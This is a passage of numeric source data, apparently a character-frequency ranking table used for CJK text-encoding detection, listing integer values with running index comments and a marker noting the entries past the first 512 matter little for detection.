1442,2143,1299,2303,2062, 447, 626,2205,1221,2739,2912,1144,1214,2206,2584, 760, # 2960
1715, 614, 950,1281,2670,2621, 810, 577,1287,2546,4648, 242,2168, 250,2643, 691, # 2976
123,2644, 647, 313,1029, 689,1357,2946,1650, 216, 771,1339,1306, 808,2063, 549, # 2992
913,1371,2913,2914,6149,1466,1092,1174,1196,1311,2605,2396,1783,1796,3079, 406, # 3008
2671,2117,3949,4649, 487,1825,2220,6150,2915, 448,2348,1073,6151,2397,1707, 130, # 3024
900,1598, 329, 176,1959,2527,1620,6152,2275,4336,3319,1983,2191,3705,3610,2155, # 3040
3706,1912,1513,1614,6153,1988, 646, 392,2304,1589,3320,3039,1826,1239,1352,1340, # 3056
2916, 505,2567,1709,1437,2408,2547, 906,6154,2672, 384,1458,1594,1100,1329, 710, # 3072
423,3531,2064,2231,2622,1989,2673,1087,1882, 333, 841,3005,1296,2882,2379, 580, # 3088
1937,1827,1293,2585, 601, 574, 249,1772,4118,2079,1120, 645, 901,1176,1690, 795, # 3104
2207, 478,1434, 516,1190,1530, 761,2080, 930,1264, 355, 435,1552, 644,1791, 987, # 3120
220,1364,1163,1121,1538, 306,2169,1327,1222, 546,2645, 218, 241, 610,1704,3321, # 3136
1984,1839,1966,2528, 451,6155,2586,3707,2568, 907,3178, 254,2947, 186,1845,4650, # 3152
745, 432,1757, 428,1633, 888,2246,2221,2489,3611,2118,1258,1265, 956,3127,1784, # 3168
4337,2490, 319, 510, 119, 457,3612, 274,2035,2007,4651,1409,3128, 970,2758, 590, # 3184
2800, 661,2247,4652,2008,3950,1420,1549,3080,3322,3951,1651,1375,2111, 485,2491, # 3200
1429,1156,6156,2548,2183,1495, 831,1840,2529,2446, 501,1657, 307,1894,3247,1341, # 3216
666, 899,2156,1539,2549,1559, 886, 349,2208,3081,2305,1736,3824,2170,2759,1014, # 3232
1913,1386, 542,1397,2948, 490, 368, 716, 362, 159, 282,2569,1129,1658,1288,1750, # 3248
2674, 276, 649,2016, 751,1496, 658,1818,1284,1862,2209,2087,2512,3451, 622,2834, # 3264
376, 117,1060,2053,1208,1721,1101,1443, 247,1250,3179,1792,3952,2760,2398,3953, # 3280
6157,2144,3708, 446,2432,1151,2570,3452,2447,2761,2835,1210,2448,3082, 424,2222, # 3296
1251,2449,2119,2836, 504,1581,4338, 602, 817, 857,3825,2349,2306, 357,3826,1470, # 3312
1883,2883, 255, 958, 929,2917,3248, 302,4653,1050,1271,1751,2307,1952,1430,2697, # 3328
2719,2359, 354,3180, 777, 158,2036,4339,1659,4340,4654,2308,2949,2248,1146,2232, # 3344
3532,2720,1696,2623,3827,6158,3129,1550,2698,1485,1297,1428, 637, 931,2721,2145, # 3360
914,2550,2587, 81,2450, 612, 827,2646,1242,4655,1118,2884, 472,1855,3181,3533, # 3376
3534, 569,1353,2699,1244,1758,2588,4119,2009,2762,2171,3709,1312,1531,6159,1152, # 3392
1938, 134,1830, 471,3710,2276,1112,1535,3323,3453,3535, 982,1337,2950, 488, 826, # 3408
674,1058,1628,4120,2017, 522,2399, 211, 568,1367,3454, 350, 293,1872,1139,3249, # 3424
1399,1946,3006,1300,2360,3324, 588, 736,6160,2606, 744, 669,3536,3828,6161,1358, # 3440
199, 723, 848, 933, 851,1939,1505,1514,1338,1618,1831,4656,1634,3613, 443,2740, # 3456
3829, 717,1947, 491,1914,6162,2551,1542,4121,1025,6163,1099,1223, 198,3040,2722, # 3472
370, 410,1905,2589, 998,1248,3182,2380, 519,1449,4122,1710, 947, 928,1153,4341, # 3488
2277, 344,2624,1511, 615, 105, 161,1212,1076,1960,3130,2054,1926,1175,1906,2473, # 3504
414,1873,2801,6164,2309, 315,1319,3325, 318,2018,2146,2157, 963, 631, 223,4342, # 3520
4343,2675, 479,3711,1197,2625,3712,2676,2361,6165,4344,4123,6166,2451,3183,1886, # 3536
2184,1674,1330,1711,1635,1506, 799, 219,3250,3083,3954,1677,3713,3326,2081,3614, # 3552
1652,2073,4657,1147,3041,1752, 643,1961, 147,1974,3955,6167,1716,2037, 918,3007, # 3568
1994, 120,1537, 118, 609,3184,4345, 740,3455,1219, 332,1615,3830,6168,1621,2980, # 3584
1582, 783, 212, 553,2350,3714,1349,2433,2082,4124, 889,6169,2310,1275,1410, 973, # 3600
166,1320,3456,1797,1215,3185,2885,1846,2590,2763,4658, 629, 822,3008, 763, 940, # 3616
1990,2862, 439,2409,1566,1240,1622, 926,1282,1907,2764, 654,2210,1607, 327,1130, # 3632
3956,1678,1623,6170,2434,2192, 686, 608,3831,3715, 903,3957,3042,6171,2741,1522, # 3648
1915,1105,1555,2552,1359, 323,3251,4346,3457, 738,1354,2553,2311,2334,1828,2003, # 3664
3832,1753,2351,1227,6172,1887,4125,1478,6173,2410,1874,1712,1847, 520,1204,2607, # 3680
264,4659, 836,2677,2102, 600,4660,3833,2278,3084,6174,4347,3615,1342, 640, 532, # 3696
543,2608,1888,2400,2591,1009,4348,1497, 341,1737,3616,2723,1394, 529,3252,1321, # 3712
983,4661,1515,2120, 971,2592, 924, 287,1662,3186,4349,2700,4350,1519, 908,1948, # 3728
2452, 156, 796,1629,1486,2223,2055, 694,4126,1259,1036,3392,1213,2249,2742,1889, # 3744
1230,3958,1015, 910, 408, 559,3617,4662, 746, 725, 935,4663,3959,3009,1289, 563, # 3760
867,4664,3960,1567,2981,2038,2626, 988,2263,2381,4351, 143,2374, 704,1895,6175, # 3776
1188,3716,2088, 673,3085,2362,4352, 484,1608,1921,2765,2918, 215, 904,3618,3537, # 3792
894, 509, 976,3043,2701,3961,4353,2837,2982, 498,6176,6177,1102,3538,1332,3393, # 3808
1487,1636,1637, 233, 245,3962, 383, 650, 995,3044, 460,1520,1206,2352, 749,3327, # 3824
530, 700, 389,1438,1560,1773,3963,2264, 719,2951,2724,3834, 870,1832,1644,1000, # 3840
839,2474,3717, 197,1630,3394, 365,2886,3964,1285,2133, 734, 922, 818,1106, 732, # 3856
480,2083,1774,3458, 923,2279,1350, 221,3086, 85,2233,2234,3835,1585,3010,2147, # 3872
1387,1705,2382,1619,2475, 133, 239,2802,1991,1016,2084,2383, 411,2838,1113, 651, # 3888
1985,1160,3328, 990,1863,3087,1048,1276,2647, 265,2627,1599,3253,2056, 150, 638, # 3904
2019, 656, 853, 326,1479, 680,1439,4354,1001,1759, 413,3459,3395,2492,1431, 459, # 3920
4355,1125,3329,2265,1953,1450,2065,2863, 849, 351,2678,3131,3254,3255,1104,1577, # 3936
227,1351,1645,2453,2193,1421,2887, 812,2121, 634, 95,2435, 201,2312,4665,1646, # 3952
1671,2743,1601,2554,2702,2648,2280,1315,1366,2089,3132,1573,3718,3965,1729,1189, # 3968
328,2679,1077,1940,1136, 558,1283, 964,1195, 621,2074,1199,1743,3460,3619,1896, # 3984
1916,1890,3836,2952,1154,2112,1064, 862, 378,3011,2066,2113,2803,1568,2839,6178, # 4000
3088,2919,1941,1660,2004,1992,2194, 142, 707,1590,1708,1624,1922,1023,1836,1233, # 4016
1004,2313, 789, 741,3620,6179,1609,2411,1200,4127,3719,3720,4666,2057,3721, 593, # 4032
2840, 367,2920,1878,6180,3461,1521, 628,1168, 692,2211,2649, 300, 720,2067,2571, # 4048
2953,3396, 959,2504,3966,3539,3462,1977, 701,6181, 954,1043, 800, 681, 183,3722, # 4064
1803,1730,3540,4128,2103, 815,2314, 174, 467, 230,2454,1093,2134, 755,3541,3397, # 4080
1141,1162,6182,1738,2039, 270,3256,2513,1005,1647,2185,3837, 858,1679,1897,1719, # 4096
2954,2324,1806, 402, 670, 167,4129,1498,2158,2104, 750,6183, 915, 189,1680,1551, # 4112
455,4356,1501,2455, 405,1095,2955, 338,1586,1266,1819, 570, 641,1324, 237,1556, # 4128
2650,1388,3723,6184,1368,2384,1343,1978,3089,2436, 879,3724, 792,1191, 758,3012, # 4144
1411,2135,1322,4357, 240,4667,1848,3725,1574,6185, 420,3045,1546,1391, 714,4358, # 4160
1967, 941,1864, 863, 664, 426, 560,1731,2680,1785,2864,1949,2363, 403,3330,1415, # 4176
1279,2136,1697,2335, 204, 721,2097,3838, 90,6186,2085,2505, 191,3967, 124,2148, # 4192
1376,1798,1178,1107,1898,1405, 860,4359,1243,1272,2375,2983,1558,2456,1638, 113, # 4208
3621, 578,1923,2609, 880, 386,4130, 784,2186,2266,1422,2956,2172,1722, 497, 263, # 4224
2514,1267,2412,2610, 177,2703,3542, 774,1927,1344, 616,1432,1595,1018, 172,4360, # 4240
2325, 911,4361, 438,1468,3622, 794,3968,2024,2173,1681,1829,2957, 945, 895,3090, # 4256
575,2212,2476, 475,2401,2681, 785,2744,1745,2293,2555,1975,3133,2865, 394,4668, # 4272
3839, 635,4131, 639, 202,1507,2195,2766,1345,1435,2572,3726,1908,1184,1181,2457, # 4288
3727,3134,4362, 843,2611, 437, 916,4669, 234, 769,1884,3046,3047,3623, 833,6187, # 4304
1639,2250,2402,1355,1185,2010,2047, 999, 525,1732,1290,1488,2612, 948,1578,3728, # 4320
2413,2477,1216,2725,2159, 334,3840,1328,3624,2921,1525,4132, 564,1056, 891,4363, # 4336
1444,1698,2385,2251,3729,1365,2281,2235,1717,6188, 864,3841,2515, 444, 527,2767, # 4352
2922,3625, 544, 461,6189, 566, 209,2437,3398,2098,1065,2068,3331,3626,3257,2137, # 4368 #last 512
#Everything below is of no interest for detection purpose
2138,2122,3730,2888,1995,1820,1044,6190,6191,6192,6193,6194,6195,6196,6197,6198, # 4384
6199,6200,6201,6202,6203,6204,6205,4670,6206,6207,6208,6209,6210,6211,6212,6213, # 4400
6214,6215,6216,6217,6218,6219,6220,6221,6222,6223,6224,6225,6226,6227,6228,6229, # 4416
6230,6231,6232,6233,6234,6235,6236,6237,3187,6238,6239,3969,6240,6241,6242,6243, # 4432
6244,4671,6245,6246,4672,6247,6248,4133,6249,6250,4364,6251,2923,2556,2613,4673, # 4448
4365,3970,6252,6253,6254,6255,4674,6256,6257,6258,2768,2353,4366,4675,4676,3188, # 4464
4367,3463,6259,4134,4677,4678,6260,2267,6261,3842,3332,4368,3543,6262,6263,6264, # 4480
3013,1954,1928,4135,4679,6265,6266,2478,3091,6267,4680,4369,6268,6269,1699,6270, # 4496
3544,4136,4681,6271,4137,6272,4370,2804,6273,6274,2593,3971,3972,4682,6275,2236, # 4512
4683,6276,6277,4684,6278,6279,4138,3973,4685,6280,6281,3258,6282,6283,6284,6285, # 4528
3974,4686,2841,3975,6286,6287,3545,6288,6289,4139,4687,4140,6290,4141,6291,4142, # 4544
6292,6293,3333,6294,6295,6296,4371,6297,3399,6298,6299,4372,3976,6300,6301,6302, # 4560
4373,6303,6304,3843,3731,6305,4688,4374,6306,6307,3259,2294,6308,3732,2530,4143, # 4576
6309,4689,6310,6311,6312,3048,6313,6314,4690,3733,2237,6315,6316,2282,3334,6317, # 4592
6318,3844,6319,6320,4691,6321,3400,4692,6322,4693,6323,3049,6324,4375,6325,3977, # 4608
6326,6327,6328,3546,6329,4694,3335,6330,4695,4696,6331,6332,6333,6334,4376,3978, # 4624
6335,4697,3979,4144,6336,3980,4698,6337,6338,6339,6340,6341,4699,4700,4701,6342, # 4640
6343,4702,6344,6345,4703,6346,6347,4704,6348,4705,4706,3135,6349,4707,6350,4708, # 4656
6351,4377,6352,4709,3734,4145,6353,2506,4710,3189,6354,3050,4711,3981,6355,3547, # 4672
3014,4146,4378,3735,2651,3845,3260,3136,2224,1986,6356,3401,6357,4712,2594,3627, # 4688
3137,2573,3736,3982,4713,3628,4714,4715,2682,3629,4716,6358,3630,4379,3631,6359, # 4704
6360,6361,3983,6362,6363,6364,6365,4147,3846,4717,6366,6367,3737,2842,6368,4718, # 4720
2628,6369,3261,6370,2386,6371,6372,3738,3984,4719,3464,4720,3402,6373,2924,3336, # 4736
4148,2866,6374,2805,3262,4380,2704,2069,2531,3138,2806,2984,6375,2769,6376,4721, # 4752
4722,3403,6377,6378,3548,6379,6380,2705,3092,1979,4149,2629,3337,2889,6381,3338, # 4768
4150,2557,3339,4381,6382,3190,3263,3739,6383,4151,4723,4152,2558,2574,3404,3191, # 4784
6384,6385,4153,6386,4724,4382,6387,6388,4383,6389,6390,4154,6391,4725,3985,6392, # 4800
3847,4155,6393,6394,6395,6396,6397,3465,6398,4384,6399,6400,6401,6402,6403,6404, # 4816
4156,6405,6406,6407,6408,2123,6409,6410,2326,3192,4726,6411,6412,6413,6414,4385, # 4832
4157,6415,6416,4158,6417,3093,3848,6418,3986,6419,6420,3849,6421,6422,6423,4159, # 4848
6424,6425,4160,6426,3740,6427,6428,6429,6430,3987,6431,4727,6432,2238,6433,6434, # 4864
4386,3988,6435,6436,3632,6437,6438,2843,6439,6440,6441,6442,3633,6443,2958,6444, # 4880
6445,3466,6446,2364,4387,3850,6447,4388,2959,3340,6448,3851,6449,4728,6450,6451, # 4896
3264,4729,6452,3193,6453,4389,4390,2706,3341,4730,6454,3139,6455,3194,6456,3051, # 4912
2124,3852,1602,4391,4161,3853,1158,3854,4162,3989,4392,3990,4731,4732,4393,2040, # 4928
4163,4394,3265,6457,2807,3467,3855,6458,6459,6460,3991,3468,4733,4734,6461,3140, # 4944
2960,6462,4735,6463,6464,6465,6466,4736,4737,4738,4739,6467,6468,4164,2403,3856, # 4960
6469,6470,2770,2844,6471,4740,6472,6473,6474,6475,6476,6477,6478,3195,6479,4741, # 4976
4395,6480,2867,6481,4742,2808,6482,2493,4165,6483,6484,6485,6486,2295,4743,6487, # 4992
6488,6489,3634,6490,6491,6492,6493,6494,6495,6496,2985,4744,6497,6498,4745,6499, # 5008
6500,2925,3141,4166,6501,6502,4746,6503,6504,4747,6505,6506,6507,2890,6508,6509, # 5024
6510,6511,6512,6513,6514,6515,6516,6517,6518,6519,3469,4167,6520,6521,6522,4748, # 5040
4396,3741,4397,4749,4398,3342,2125,4750,6523,4751,4752,4753,3052,6524,2961,4168, # 5056
6525,4754,6526,4755,4399,2926,4169,6527,3857,6528,4400,4170,6529,4171,6530,6531, # 5072
2595,6532,6533,6534,6535,3635,6536,6537,6538,6539,6540,6541,6542,4756,6543,6544, # 5088
6545,6546,6547,6548,4401,6549,6550,6551,6552,4402,3405,4757,4403,6553,6554,6555, # 5104
4172,3742,6556,6557,6558,3992,3636,6559,6560,3053,2726,6561,3549,4173,3054,4404, # 5120
6562,6563,3993,4405,3266,3550,2809,4406,6564,6565,6566,4758,4759,6567,3743,6568, # 5136
4760,3744,4761,3470,6569,6570,6571,4407,6572,3745,4174,6573,4175,2810,4176,3196, # 5152
4762,6574,4177,6575,6576,2494,2891,3551,6577,6578,3471,6579,4408,6580,3015,3197, # 5168
6581,3343,2532,3994,3858,6582,3094,3406,4409,6583,2892,4178,4763,4410,3016,4411, # 5184
6584,3995,3142,3017,2683,6585,4179,6586,6587,4764,4412,6588,6589,4413,6590,2986, # 5200
6591,2962,3552,6592,2963,3472,6593,6594,4180,4765,6595,6596,2225,3267,4414,6597, # 5216
3407,3637,4766,6598,6599,3198,6600,4415,6601,3859,3199,6602,3473,4767,2811,4416, # 5232
1856,3268,3200,2575,3996,3997,3201,4417,6603,3095,2927,6604,3143,6605,2268,6606, # 5248
3998,3860,3096,2771,6607,6608,3638,2495,4768,6609,3861,6610,3269,2745,4769,4181, # 5264
3553,6611,2845,3270,6612,6613,6614,3862,6615,6616,4770,4771,6617,3474,3999,4418, # 5280
4419,6618,3639,3344,6619,4772,4182,6620,2126,6621,6622,6623,4420,4773,6624,3018, # 5296
6625,4774,3554,6626,4183,2025,3746,6627,4184,2707,6628,4421,4422,3097,1775,4185, # 5312
3555,6629,6630,2868,6631,6632,4423,6633,6634,4424,2414,2533,2928,6635,4186,2387, # 5328
6636,4775,6637,4187,6638,1891,4425,3202,3203,6639,6640,4776,6641,3345,6642,6643, # 5344
3640,6644,3475,3346,3641,4000,6645,3144,6646,3098,2812,4188,3642,3204,6647,3863, # 5360
3476,6648,3864,6649,4426,4001,6650,6651,6652,2576,6653,4189,4777,6654,6655,6656, # 5376
2846,6657,3477,3205,4002,6658,4003,6659,3347,2252,6660,6661,6662,4778,6663,6664, # 5392
6665,6666,6667,6668,6669,4779,4780,2048,6670,3478,3099,6671,3556,3747,4004,6672, # 5408
6673,6674,3145,4005,3748,6675,6676,6677,6678,6679,3408,6680,6681,6682,6683,3206, # 5424
3207,6684,6685,4781,4427,6686,4782,4783,4784,6687,6688,6689,4190,6690,6691,3479, # 5440
6692,2746,6693,4428,6694,6695,6696,6697,6698,6699,4785,6700,6701,3208,2727,6702, # 5456
3146,6703,6704,3409,2196,6705,4429,6706,6707,6708,2534,1996,6709,6710,6711,2747, # 5472
6712,6713,6714,4786,3643,6715,4430,4431,6716,3557,6717,4432,4433,6718,6719,6720, # 5488
6721,3749,6722,4006,4787,6723,6724,3644,4788,4434,6725,6726,4789,2772,6727,6728, # 5504
6729,6730,6731,2708,3865,2813,4435,6732,6733,4790,4791,3480,6734,6735,6736,6737, # 5520
4436,3348,6738,3410,4007,6739,6740,4008,6741,6742,4792,3411,4191,6743,6744,6745, # 5536
6746,6747,3866,6748,3750,6749,6750,6751,6752,6753,6754,6755,3867,6756,4009,6757, # 5552
4793,4794,6758,2814,2987,6759,6760,6761,4437,6762,6763,6764,6765,3645,6766,6767, # 5568
3481,4192,6768,3751,6769,6770,2174,6771,3868,3752,6772,6773,6774,4193,4795,4438, # 5584
3558,4796,4439,6775,4797,6776,6777,4798,6778,4799,3559,4800,6779,6780,6781,3482, # 5600
6782,2893,6783,6784,4194,4801,4010,6785,6786,4440,6787,4011,6788,6789,6790,6791, # 5616
6792,6793,4802,6794,6795,6796,4012,6797,6798,6799,6800,3349,4803,3483,6801,4804, # 5632
4195,6802,4013,6803,6804,4196,6805,4014,4015,6806,2847,3271,2848,6807,3484,6808, # 5648
6809,6810,4441,6811,4442,4197,4443,3272,4805,6812,3412,4016,1579,6813,6814,4017, # 5664
6815,3869,6816,2964,6817,4806,6818,6819,4018,3646,6820,6821,4807,4019,4020,6822, # 5680
6823,3560,6824,6825,4021,4444,6826,4198,6827,6828,4445,6829,6830,4199,4808,6831, # 5696
6832,6833,3870,3019,2458,6834,3753,3413,3350,6835,4809,3871,4810,3561,4446,6836, # 5712
6837,4447,4811,4812,6838,2459,4448,6839,4449,6840,6841,4022,3872,6842,4813,4814, # 5728
6843,6844,4815,4200,4201,4202,6845,4023,6846,6847,4450,3562,3873,6848,6849,4816, # 5744
4817,6850,4451,4818,2139,6851,3563,6852,6853,3351,6854,6855,3352,4024,2709,3414, # 5760
4203,4452,6856,4204,6857,6858,3874,3875,6859,6860,4819,6861,6862,6863,6864,4453, # 5776
3647,6865,6866,4820,6867,6868,6869,6870,4454,6871,2869,6872,6873,4821,6874,3754, # 5792
6875,4822,4205,6876,6877,6878,3648,4206,4455,6879,4823,6880,4824,3876,6881,3055, # 5808
4207,6882,3415,6883,6884,6885,4208,4209,6886,4210,3353,6887,3354,3564,3209,3485, # 5824
2652,6888,2728,6889,3210,3755,6890,4025,4456,6891,4825,6892,6893,6894,6895,4211, # 5840
6896,6897,6898,4826,6899,6900,4212,6901,4827,6902,2773,3565,6903,4828,6904,6905, # 5856
6906,6907,3649,3650,6908,2849,3566,6909,3567,3100,6910,6911,6912,6913,6914,6915, # 5872
4026,6916,3355,4829,3056,4457,3756,6917,3651,6918,4213,3652,2870,6919,4458,6920, # 5888
2438,6921,6922,3757,2774,4830,6923,3356,4831,4832,6924,4833,4459,3653,2507,6925, # 5904
4834,2535,6926,6927,3273,4027,3147,6928,3568,6929,6930,6931,4460,6932,3877,4461, # 5920
2729,3654,6933,6934,6935,6936,2175,4835,2630,4214,4028,4462,4836,4215,6937,3148, # 5936
4216,4463,4837,4838,4217,6938,6939,2850,4839,6940,4464,6941,6942,6943,4840,6944, # 5952
4218,3274,4465,6945,6946,2710,6947,4841,4466,6948,6949,2894,6950,6951,4842,6952, # 5968
4219,3057,2871,6953,6954,6955,6956,4467,6957,2711,6958,6959,6960,3275,3101,4843, # 5984
6961,3357,3569,6962,4844,6963,6964,4468,4845,3570,6965,3102,4846,3758,6966,4847, # 6000
3878,4848,4849,4029,6967,2929,3879,4850,4851,6968,6969,1733,6970,4220,6971,6972, # 6016
6973,6974,6975,6976,4852,6977,6978,6979,6980,6981,6982,3759,6983,6984,6985,3486, # 6032
3487,6986,3488,3416,6987,6988,6989,6990,6991,6992,6993,6994,6995,6996,6997,4853, # 6048
6998,6999,4030,7000,7001,3211,7002,7003,4221,7004,7005,3571,4031,7006,3572,7007, # 6064
2614,4854,2577,7008,7009,2965,3655,3656,4855,2775,3489,3880,4222,4856,3881,4032, # 6080
3882,3657,2730,3490,4857,7010,3149,7011,4469,4858,2496,3491,4859,2283,7012,7013, # 6096
7014,2365,4860,4470,7015,7016,3760,7017,7018,4223,1917,7019,7020,7021,4471,7022, # 6112
2776,4472,7023,7024,7025,7026,4033,7027,3573,4224,4861,4034,4862,7028,7029,1929, # 6128
3883,4035,7030,4473,3058,7031,2536,3761,3884,7032,4036,7033,2966,2895,1968,4474, # 6144
3276,4225,3417,3492,4226,2105,7034,7035,1754,2596,3762,4227,4863,4475,3763,4864, # 6160
3764,2615,2777,3103,3765,3658,3418,4865,2296,3766,2815,7036,7037,7038,3574,2872, # 6176
3277,4476,7039,4037,4477,7040,7041,4038,7042,7043,7044,7045,7046,7047,2537,7048, # 6192
7049,7050,7051,7052,7053,7054,4478,7055,7056,3767,3659,4228,3575,7057,7058,4229, # 6208
7059,7060,7061,3660,7062,3212,7063,3885,4039,2460,7064,7065,7066,7067,7068,7069, # 6224
7070,7071,7072,7073,7074,4866,3768,4867,7075,7076,7077,7078,4868,3358,3278,2653, # 6240
7079,7080,4479,3886,7081,7082,4869,7083,7084,7085,7086,7087,7088,2538,7089,7090, # 6256
7091,4040,3150,3769,4870,4041,2896,3359,4230,2930,7092,3279,7093,2967,4480,3213, # 6272
4481,3661,7094,7095,7096,7097,7098,7099,7100,7101,7102,2461,3770,7103,7104,4231, # 6288
3151,7105,7106,7107,4042,3662,7108,7109,4871,3663,4872,4043,3059,7110,7111,7112, # 6304
3493,2988,7113,4873,7114,7115,7116,3771,4874,7117,7118,4232,4875,7119,3576,2336, # 6320
4876,7120,4233,3419,4044,4877,4878,4482,4483,4879,4484,4234,7121,3772,4880,1045, # 6336
3280,3664,4881,4882,7122,7123,7124,7125,4883,7126,2778,7127,4485,4486,7128,4884, # 6352
3214,3887,7129,7130,3215,7131,4885,4045,7132,7133,4046,7134,7135,7136,7137,7138, # 6368
7139,7140,7141,7142,7143,4235,7144,4886,7145,7146,7147,4887,7148,7149,7150,4487, # 6384
4047,4488,7151,7152,4888,4048,2989,3888,7153,3665,7154,4049,7155,7156,7157,7158, # 6400
7159,7160,2931,4889,4890,4489,7161,2631,3889,4236,2779,7162,7163,4891,7164,3060, # 6416
7165,1672,4892,7166,4893,4237,3281,4894,7167,7168,3666,7169,3494,7170,7171,4050, # 6432
7172,7173,3104,3360,3420,4490,4051,2684,4052,7174,4053,7175,7176,7177,2253,4054, # 6448
7178,7179,4895,7180,3152,3890,3153,4491,3216,7181,7182,7183,2968,4238,4492,4055, # 6464
7184,2990,7185,2479,7186,7187,4493,7188,7189,7190,7191,7192,4896,7193,4897,2969, # 6480
4494,4898,7194,3495,7195,7196,4899,4495,7197,3105,2731,7198,4900,7199,7200,7201, # 6496
4056,7202,3361,7203,7204,4496,4901,4902,7205,4497,7206,7207,2315,4903,7208,4904, # 6512
7209,4905,2851,7210,7211,3577,7212,3578,4906,7213,4057,3667,4907,7214,4058,2354, # 6528
3891,2376,3217,3773,7215,7216,7217,7218,7219,4498,7220,4908,3282,2685,7221,3496, # 6544
4909,2632,3154,4910,7222,2337,7223,4911,7224,7225,7226,4912,4913,3283,4239,4499, # 6560
7227,2816,7228,7229,7230,7231,7232,7233,7234,4914,4500,4501,7235,7236,7237,2686, # 6576
7238,4915,7239,2897,4502,7240,4503,7241,2516,7242,4504,3362,3218,7243,7244,7245, # 6592
4916,7246,7247,4505,3363,7248,7249,7250,7251,3774,4506,7252,7253,4917,7254,7255, # 6608
3284,2991,4918,4919,3219,3892,4920,3106,3497,4921,7256,7257,7258,4922,7259,4923, # 6624
3364,4507,4508,4059,7260,4240,3498,7261,7262,4924,7263,2992,3893,4060,3220,7264, # 6640
7265,7266,7267,7268,7269,4509,3775,7270,2817,7271,4061,4925,4510,3776,7272,4241, # 6656
4511,3285,7273,7274,3499,7275,7276,7277,4062,4512,4926,7278,3107,3894,7279,7280, # 6672
4927,7281,4513,7282,7283,3668,7284,7285,4242,4514,4243,7286,2058,4515,4928,4929, # 6688
4516,7287,3286,4244,7288,4517,7289,7290,7291,3669,7292,7293,4930,4931,4932,2355, # 6704
4933,7294,2633,4518,7295,4245,7296,7297,4519,7298,7299,4520,4521,4934,7300,4246, # 6720
4522,7301,7302,7303,3579,7304,4247,4935,7305,4936,7306,7307,7308,7309,3777,7310, # 6736
4523,7311,7312,7313,4248,3580,7314,4524,3778,4249,7315,3581,7316,3287,7317,3221, # 6752
7318,4937,7319,7320,7321,7322,7323,7324,4938,4939,7325,4525,7326,7327,7328,4063, # 6768
7329,7330,4940,7331,7332,4941,7333,4526,7334,3500,2780,1741,4942,2026,1742,7335, # 6784
7336,3582,4527,2388,7337,7338,7339,4528,7340,4250,4943,7341,7342,7343,4944,7344, # 6800
7345,7346,3020,7347,4945,7348,7349,7350,7351,3895,7352,3896,4064,3897,7353,7354, # 6816
7355,4251,7356,7357,3898,7358,3779,7359,3780,3288,7360,7361,4529,7362,4946,4530, # 6832
2027,7363,3899,4531,4947,3222,3583,7364,4948,7365,7366,7367,7368,4949,3501,4950, # 6848
3781,4951,4532,7369,2517,4952,4252,4953,3155,7370,4954,4955,4253,2518,4533,7371, # 6864
7372,2712,4254,7373,7374,7375,3670,4956,3671,7376,2389,3502,4065,7377,2338,7378, # 6880
7379,7380,7381,3061,7382,4957,7383,7384,7385,7386,4958,4534,7387,7388,2993,7389, # 6896
3062,7390,4959,7391,7392,7393,4960,3108,4961,7394,4535,7395,4962,3421,4536,7396, # 6912
4963,7397,4964,1857,7398,4965,7399,7400,2176,3584,4966,7401,7402,3422,4537,3900, # 6928
3585,7403,3782,7404,2852,7405,7406,7407,4538,3783,2654,3423,4967,4539,7408,3784, # 6944
3586,2853,4540,4541,7409,3901,7410,3902,7411,7412,3785,3109,2327,3903,7413,7414, # 6960
2970,4066,2932,7415,7416,7417,3904,3672,3424,7418,4542,4543,4544,7419,4968,7420, # 6976
7421,4255,7422,7423,7424,7425,7426,4067,7427,3673,3365,4545,7428,3110,2559,3674, # 6992
7429,7430,3156,7431,7432,3503,7433,3425,4546,7434,3063,2873,7435,3223,4969,4547, # 7008
4548,2898,4256,4068,7436,4069,3587,3786,2933,3787,4257,4970,4971,3788,7437,4972, # 7024
3064,7438,4549,7439,7440,7441,7442,7443,4973,3905,7444,2874,7445,7446,7447,7448, # 7040
3021,7449,4550,3906,3588,4974,7450,7451,3789,3675,7452,2578,7453,4070,7454,7455, # 7056
7456,4258,3676,7457,4975,7458,4976,4259,3790,3504,2634,4977,3677,4551,4260,7459, # 7072
7460,7461,7462,3907,4261,4978,7463,7464,7465,7466,4979,4980,7467,7468,2213,4262, # 7088
7469,7470,7471,3678,4981,7472,2439,7473,4263,3224,3289,7474,3908,2415,4982,7475, # 7104
4264,7476,4983,2655,7477,7478,2732,4552,2854,2875,7479,7480,4265,7481,4553,4984, # 7120
7482,7483,4266,7484,3679,3366,3680,2818,2781,2782,3367,3589,4554,3065,7485,4071, # 7136
2899,7486,7487,3157,2462,4072,4555,4073,4985,4986,3111,4267,2687,3368,4556,4074, # 7152
3791,4268,7488,3909,2783,7489,2656,1962,3158,4557,4987,1963,3159,3160,7490,3112, # 7168
4988,4989,3022,4990,4991,3792,2855,7491,7492,2971,4558,7493,7494,4992,7495,7496, # 7184
7497,7498,4993,7499,3426,4559,4994,7500,3681,4560,4269,4270,3910,7501,4075,4995, # 7200
4271,7502,7503,4076,7504,4996,7505,3225,4997,4272,4077,2819,3023,7506,7507,2733, # 7216
4561,7508,4562,7509,3369,3793,7510,3590,2508,7511,7512,4273,3113,2994,2616,7513, # 7232
7514,7515,7516,7517,7518,2820,3911,4078,2748,7519,7520,4563,4998,7521,7522,7523, # 7248
7524,4999,4274,7525,4564,3682,2239,4079,4565,7526,7527,7528,7529,5000,7530,7531, # 7264
5001,4275,3794,7532,7533,7534,3066,5002,4566,3161,7535,7536,4080,7537,3162,7538, # 7280
7539,4567,7540,7541,7542,7543,7544,7545,5003,7546,4568,7547,7548,7549,7550,7551, # 7296
7552,7553,7554,7555,7556,5004,7557,7558,7559,5005,7560,3795,7561,4569,7562,7563, # 7312
7564,2821,3796,4276,4277,4081,7565,2876,7566,5006,7567,7568,2900,7569,3797,3912, # 7328
7570,7571,7572,4278,7573,7574,7575,5007,7576,7577,5008,7578,7579,4279,2934,7580, # 7344
7581,5009,7582,4570,7583,4280,7584,7585,7586,4571,4572,3913,7587,4573,3505,7588, # 7360
5010,7589,7590,7591,7592,3798,4574,7593,7594,5011,7595,4281,7596,7597,7598,4282, # 7376
5012,7599,7600,5013,3163,7601,5014,7602,3914,7603,7604,2734,4575,4576,4577,7605, # 7392
7606,7607,7608,7609,3506,5015,4578,7610,4082,7611,2822,2901,2579,3683,3024,4579, # 7408
3507,7612,4580,7613,3226,3799,5016,7614,7615,7616,7617,7618,7619,7620,2995,3290, # 7424
7621,4083,7622,5017,7623,7624,7625,7626,7627,4581,3915,7628,3291,7629,5018,7630, # 7440
7631,7632,7633,4084,7634,7635,3427,3800,7636,7637,4582,7638,5019,4583,5020,7639, # 7456
3916,7640,3801,5021,4584,4283,7641,7642,3428,3591,2269,7643,2617,7644,4585,3592, # 7472
